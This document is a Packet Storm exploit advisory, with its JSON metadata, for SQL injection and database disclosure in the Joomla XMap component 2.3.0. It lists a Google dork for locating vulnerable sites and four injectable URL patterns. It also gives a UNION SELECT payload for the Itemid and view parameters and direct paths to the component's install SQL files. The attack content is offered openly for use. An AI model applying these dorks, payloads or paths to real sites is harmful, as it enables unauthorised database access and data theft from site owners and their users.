ID PACKETSTORM:151436 Type packetstorm Reporter KingSkrupellos Modified 2019-01-31T00:00:00
Description
`####################################################################
# Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : joomla.org
# Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip
joomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882
rsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html
# Software Information Link : joomla4ever.org/extensions/ext-xmap
# Software Versions : 1.2.7 / 2.3.0 and other versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_xmap''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
# Similar CVE, but for an older version : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678
Note : Keep in mind that the CVE above covers a similar issue in an older version. This exploit/vulnerability is described here in more detail.
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010285
####################################################################
# Description about Software :
***************************
"XMAP" is open source software for Joomla.
####################################################################
# Impact :
***********
* An SQL injection vulnerability in the xmap (com_xmap) component for Joomla!
allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php.
* Successful exploitation lets attackers manipulate SQL queries by injecting arbitrary SQL code.
* The flaw exists because input passed via the 'view=' and 'Itemid=' parameters to 'index.php'
is not properly sanitised before being used in a SQL query.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_xmap&Itemid=[SQL Injection]
/index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection]
/index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection]
/index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection]
# Exploit Payload :
*****************
-1 UNION SELECT 1,2,3,version(),5,6,7,8--
####################################################################
# Database Disclosure Exploit :
****************************
/administrator/components/com_xmap/install/install.postgresql.sql
/administrator/components/com_xmap/install/install.utf8.sql
/administrator/components/com_xmap/install/uninstall.postgresql.sql
/administrator/components/com_xmap/install/uninstall.utf8.sql
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
`
{"id": "PACKETSTORM:151436", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla XMap 2.3.0 Database Disclosure / SQL Injection", "description": "", "published": "2019-01-31T00:00:00", "modified": "2019-01-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/151436/Joomla-XMap-2.3.0-Database-Disclosure-SQL-Injection.html", "reporter": "KingSkrupellos", "references": [], "cvelist": ["CVE-2010-2678"], "lastseen": "2019-02-01T02:55:02", "viewCount": 6, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-02-01T02:55:02", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-2678"]}], "modified": "2019-02-01T02:55:02", "rev": 2}, "vulnersScore": 5.4}, "sourceHref": "https://packetstormsecurity.com/files/download/151436/joomlaxmap230-sqldisclose.txt", "sourceData": "`#################################################################### \n \n# Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure \n# Author [ Discovered By ] : KingSkrupellos \n# Team : Cyberizm Digital Security Army \n# Date : 30/01/2019 \n# Vendor Homepage : joomla.org \n# Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip \njoomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882 \nrsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html \n# Software Information Link : joomla4ever.org/extensions/ext-xmap \n# Software Versions : 1.2.7 / 2.3.0 and other versions \n# Tested On : Windows and Linux \n# Category : WebApps \n# Exploit Risk : Medium \n# Google Dorks : inurl:''/index.php?option=com_xmap'' \n# Vulnerability Type : CWE-89 [ Improper Neutralization of \nSpecial Elements used in an SQL Command ('SQL Injection') ] \nCWE-200 [ Information Exposure ] \n# Similar but for old Version CVE : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678 \nNote : 
Keep in mind. This Exploit/Vuln has been told in more details. \n# PacketStormSecurity : packetstormsecurity.com/files/authors/13968 \n# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ \n# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos \n# Reference Link : cxsecurity.com/issue/WLB-2019010285 \n \n#################################################################### \n \n# Description about Software : \n*************************** \n \n\"XMAP\" is open source software for Joomla. \n \n#################################################################### \n \n# Impact : \n*********** \n* SQL injection vulnerability in xmap (com_xmap) component for Joomla! \n \nallows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php. \n \n* Successful exploitation will let attackers to manipulate SQL queries by injecting arbitrary SQL code. \n \n* The flaw is due to input passed via 'view=' and 'Itemid=' parameter to 'index.php' \n \nis not properly sanitised before being used in a SQL query. 
\n \n#################################################################### \n \n# SQL Injection Exploit : \n********************** \n \n/index.php?option=com_xmap&Itemid=[SQL Injection] \n \n/index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection] \n \n/index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection] \n \n/index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection] \n \n# Exploit Payload : \n***************** \n \n-1 UNION SELECT 1,2,3,version(),5,6,7,8-- \n \n#################################################################### \n \n# Database Disclosure Exploit : \n**************************** \n \n/administrator/components/com_xmap/install/install.postgresql.sql \n \n/administrator/components/com_xmap/install/install.utf8.sql \n \n/administrator/components/com_xmap/install/uninstall.postgresql.sql \n \n/administrator/components/com_xmap/install/uninstall.utf8.sql \n \n#################################################################### \n \n# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team \n \n#################################################################### \n`\n"}